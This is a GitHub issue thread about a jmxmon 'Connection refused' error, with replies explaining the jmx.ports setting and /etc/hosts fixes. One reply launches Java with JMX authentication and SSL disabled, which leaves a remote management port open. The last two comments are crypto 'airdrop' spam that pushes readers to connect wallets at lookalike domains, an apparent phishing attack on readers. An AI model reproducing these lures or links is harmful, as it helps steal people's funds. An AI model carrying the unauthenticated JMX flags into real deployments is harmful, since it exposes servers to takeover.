### ISSUE TITLE
refused to host: localhost; nested exception is:  	java.net.ConnectException: 拒绝连接

### ISSUE THREAD

**Issue by geespot** [toomanyopenfiles/jmxmon#10]
conf.properties
# the working dir
workDir=./
# localhost jmx ports, split by comma
# agent port url
jmx.ports=8099
agent.posturl=http://localhost:1988/v1/push

this program always print  this logs,can not get data?
 
30 15:04:56,502 [pool-1-thread-1] ERROR [com.stephan.tof.jmxmon.JMXMonitor] - Connection refused to host: localhost; nested exception is: 
	java.net.ConnectException: 拒绝连接
java.rmi.ConnectException: Connection refused to host: localhost; nested exception is: 
	java.net.ConnectException: 拒绝连接
	at sun.rmi.transport.tcp.TCPEndpoint.newSocket(TCPEndpoint.java:619)
	at sun.rmi.transport.tcp.TCPChannel.createConnection(TCPChannel.java:216)
	at sun.rmi.transport.tcp.TCPChannel.newConnection(TCPChannel.java:202)
	at sun.rmi.server.UnicastRef.newCall(UnicastRef.java:342)
	at sun.rmi.registry.RegistryImpl_Stub.lookup(Unknown Source)
	at com.stephan.tof.jmxmon.jmxutil.ProxyClient.checkSslConfig(ProxyClient.java:274)
	at com.stephan.tof.jmxmon.jmxutil.ProxyClient.<init>(ProxyClient.java:167)
	at com.stephan.tof.jmxmon.jmxutil.ProxyClient.getProxyClient(ProxyClient.java:518)
	at com.stephan.tof.jmxmon.JMXMonitor.runTask(JMXMonitor.java:58)
	at com.stephan.tof.jmxmon.JMXMonitor.access$0(JMXMonitor.java:50)
	at com.stephan.tof.jmxmon.JMXMonitor$1.run(JMXMonitor.java:41)
	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
	at java.util.concurrent.FutureTask.runAndReset(FutureTask.java:308)
	at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$301(ScheduledThreadPoolExecutor.java:180)
	at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:294)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
	at java.lang.Thread.run(Thread.java:745)

**Comment by maoerniu** [comment]
我也遇到这个问题了，求指教

**Comment by maoerniu** [comment]
配置文件jmx.ports配置的是你要监控的java进程的端口，如果多个进程可以配置多个

**Comment by maoling** [comment]
配置文件jmx.ports配置的是你要监控的java进程对外暴露的端口。首先java程序要先暴露jmx，比如：
nohup java -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=8099 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.rmi.server.hostname=10.19.18.666 -Xmx6g -Xms2g -jar ooxx-1.0-SNAPSHOT.jar &

**Comment by dingmy002** [comment]
我也碰到这个问题了，请问解决了吗？
我namenode开启了jmx，listen的是内网ip:50070，但是从报错日志上看是默认走localhost:50070,请问下怎么配置ip:port格式的参数

**Comment by maoling** [comment]
@dingmy002 
配置一下 /etc/hosts
e.g  10.23.45.67 conf-center_002

**Comment by myh4905** [comment]
请仔细查看你的/etc/hosts，我的也是这个问题，不过我的是localhost写成126.0.0.1了，我改过来就好了。
你的问题应该也跟hosts文件有关

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by tgmstudios** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!
